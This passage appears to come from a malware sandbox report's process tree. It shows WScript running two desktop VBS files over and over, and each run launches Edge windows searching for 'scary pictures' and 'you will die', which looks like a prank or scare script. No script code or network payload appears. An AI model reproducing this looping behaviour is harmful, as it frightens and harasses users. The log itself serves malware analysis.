PID:9592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:9916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:9932

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:9940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:10200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:9184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:1888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:9896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:9892

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:5176

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:10348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:10392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:10536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,11448459279515062033,2884693879921243239,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
4⤵
PID:6496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,11448459279515062033,2884693879921243239,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
4⤵
PID:6484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:10544

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0xb4,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,16157909218569663193,5762442535854693933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
4⤵
PID:13888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,16157909218569663193,5762442535854693933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
4⤵
PID:13904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:10328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,12887134367372885573,12312426057788156632,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
4⤵
PID:13860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,12887134367372885573,12312426057788156632,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
4⤵
PID:13880

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:10340

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:10396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:10488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,5866419033812477904,13705671204542136251,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
4⤵
PID:14068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,5866419033812477904,13705671204542136251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
4⤵
PID:14076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:10640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11628668728883188260,14753176186287080291,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
4⤵
PID:14712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11628668728883188260,14753176186287080291,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
4⤵
PID:14720

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:10936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,17646645697374760041,1505847943529719158,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
4⤵
PID:14376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,17646645697374760041,1505847943529719158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
4⤵
PID:14404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:10860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,6660762216267152986,448889373806362067,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
4⤵
PID:15500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,6660762216267152986,448889373806362067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
4⤵
PID:15508

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:10756

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:10728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14645322717350670785,3665899184582740287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
4⤵
PID:13572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14645322717350670785,3665899184582740287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
4⤵
PID:13584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:11248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,6594780382605365272,2355524862162397009,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1448 /prefetch:2
4⤵
PID:5760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,6594780382605365272,2355524862162397009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
4⤵
PID:5784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:10468

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:10460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:10984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:10996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17419961020971313821,6263841854735363095,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
4⤵
PID:6512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17419961020971313821,6263841854735363095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
4⤵
PID:6504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:10844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
